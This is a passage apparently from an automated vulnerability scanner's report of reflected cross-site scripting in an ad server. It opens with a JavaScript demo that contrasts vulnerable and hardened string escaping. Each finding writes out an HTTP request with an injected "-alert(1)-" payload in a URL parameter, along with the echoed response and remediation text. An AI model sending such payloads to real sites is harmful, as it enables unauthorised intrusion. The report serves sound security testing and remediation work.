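function renderVulnerable(clickUrl, quote) {
  return 'var url = ' + quote + clickUrl + quote + ';\nvar fscUrl = url;';
}

// Hardened: JSON.stringify produces a valid double-quoted literal with " and \
// escaped; the extra replacements stop the value from closing a <script> block,
// opening an HTML comment, or (on older engines) breaking the line.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(clickUrl) {
  return 'var url = ' + jsStringLiteral(clickUrl) + ';\nvar fscUrl = url;';
}

// Run a generated script with alert() stubbed, returning what was called and
// what the script ended up assigning to url. new Function is used only so the
// demonstration can execute the generated text here; it is not a fix.
function run(script) {
  const calls = [];
  const fn = new Function('alert', script + '\nreturn url;');
  const url = fn((x) => calls.push(x));
  return { alertCalls: calls, url: url };
}

// Constructed inputs: a benign click-through URL and the same URL with the
// report's markers in the pos parameter (URL and parameter layout are invented).
const BENIGN = 'http://example.invalid/adx_click.html?page=x&pos=SFMiddle&goto=';
const ATTACK_DQ = BENIGN.replace('SFMiddle', 'SFMiddle5e822"-alert(1)-"4c3ac561287');
const ATTACK_SQ = BENIGN.replace('SFMiddle', "SFMiddlee2c4d'-alert(1)-'30c800381f4");

function demo() {
  return {
    // "..." - alert(1) - "..." : the marker turns one literal into an expression
    // that calls alert() and leaves url equal to NaN
    vulnerableDouble: run(renderVulnerable(ATTACK_DQ, '"')),
    vulnerableSingle: run(renderVulnerable(ATTACK_SQ, "'")),
    // the escaped literal evaluates back to the exact input; alert() never runs
    hardenedDouble: run(renderHardened(ATTACK_DQ)),
    hardenedSingle: run(renderHardened(ATTACK_SQ)),
  };
}
```

In a browser the stub would be the real alert(); the point of the subtraction operators in the marker is that they are valid on both sides of a string literal, so the scanner needs no knowledge of what code follows the injection point. The hardened renderer always emits a double-quoted literal, which is why a single quote in the value needs no special treatment there.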

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle5e822"-alert(1)-"4c3ac561287&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle5e822"-alert(1)-"4c3ac561287&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel
...[SNIP]...

4.35. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c4d'-alert(1)-'30c800381f4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddlee2c4d'-alert(1)-'30c800381f4&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddlee2c4d'-alert(1)-'30c800381f4&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel
...[SNIP]...

4.36. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b14"-alert(1)-"7dfe82f805d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacfb0b14"-alert(1)-"7dfe82f805d&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacfb0b14"-alert(1)-"7dfe82f805d&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

4.37. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5acee'-alert(1)-'0d1577c5b6e was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf5acee'-alert(1)-'0d1577c5b6e&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf5acee'-alert(1)-'0d1577c5b6e&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.38. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3de13'-alert(1)-'20284093fee was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e33de13'-alert(1)-'20284093fee&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e33de13'-alert(1)-'20284093fee&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.39. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a5cf"-alert(1)-"9d93ddc41f was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e39a5cf"-alert(1)-"9d93ddc41f&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6697

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e39a5cf"-alert(1)-"9d93ddc41f&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUr
...[SNIP]...

4.40. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90833'-alert(1)-'1a292f51b94 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90833'-alert(1)-'1a292f51b94&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90833'-alert(1)-'1a292f51b94&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.41. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e889c"-alert(1)-"f675ac94119 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclicke889c"-alert(1)-"f675ac94119&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclicke889c"-alert(1)-"f675ac94119&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

4.42. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ed64"-alert(1)-"a101d628bd6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=12898020729ed64"-alert(1)-"a101d628bd6&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=12898020729ed64"-alert(1)-"a101d628bd6&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.43. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c075a'-alert(1)-'2933f51287e was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072c075a'-alert(1)-'2933f51287e&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072c075a'-alert(1)-'2933f51287e&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.44. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2951d"-alert(1)-"f11c4fafd07 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that the scanner's parameter label does not match the request shown below: the payload is appended to the type=goto value at the start of the click-through URL's query string, not to the sz=300x250 path parameter, so that query-string position is the injection point to re-test.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto2951d"-alert(1)-"f11c4fafd07&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
